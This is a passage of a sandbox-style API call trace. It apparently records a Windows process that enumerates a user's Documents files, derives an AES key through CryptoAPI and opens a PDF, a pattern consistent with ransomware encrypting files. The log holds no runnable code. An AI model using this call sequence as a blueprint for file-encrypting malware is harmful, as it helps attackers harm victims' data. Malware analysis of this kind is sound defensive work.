cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.620] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.620] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.620] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.620] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.620] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.620] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.621] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b952d20, ftCreationTime.dwHighDateTime=0x1d5c04a, ftLastAccessTime.dwLowDateTime=0x545d4c30, ftLastAccessTime.dwHighDateTime=0x1d5c5e9, ftLastWriteTime.dwLowDateTime=0x545d4c30, ftLastWriteTime.dwHighDateTime=0x1d5c5e9, nFileSizeHigh=0x0, nFileSizeLow=0x17325, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="LCKIcVhsNU_6Z.pdf", cAlternateFileName="LCKICV~1.PDF")) returned 0x7c2240 [0035.621] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.621] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.621] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.621] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.621] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.621] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0035.621] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.621] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0035.621] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.621] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.621] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0035.621] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.621] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.621] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.621] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.621] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.622] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0035.622] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.622] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0035.622] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.622] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.623] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0035.623] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.623] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.623] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.623] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.623] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.623] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.623] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.623] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.623] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.623] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.623] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.623] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.623] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0035.623] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.623] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.623] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.623] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.623] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.623] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.623] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.623] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.623] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.624] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.624] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.624] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.624] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.624] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.624] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.624] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.624] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.624] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.624] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.624] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0035.624] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.624] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.624] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.624] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.624] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0035.624] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.625] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.625] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.625] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.625] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.625] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0035.625] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.625] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.625] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.625] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.625] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.625] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.625] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.625] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.625] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0035.625] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.625] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.625] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.625] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.625] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.625] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.625] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0035.625] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.626] CryptDestroyHash (hHash=0x7c2100) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.626] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0035.626] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0035.626] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.626] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.626] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0035.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.626] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\lckicvhsnu_6z.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.626] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.627] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0035.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0035.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0035.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.627] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0035.627] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0035.627] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0035.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0035.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0035.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0035.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0035.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0035.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c95d0 [0035.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0035.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0035.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0035.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0035.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0035.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0035.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0035.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0035.629] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\" (normalized: 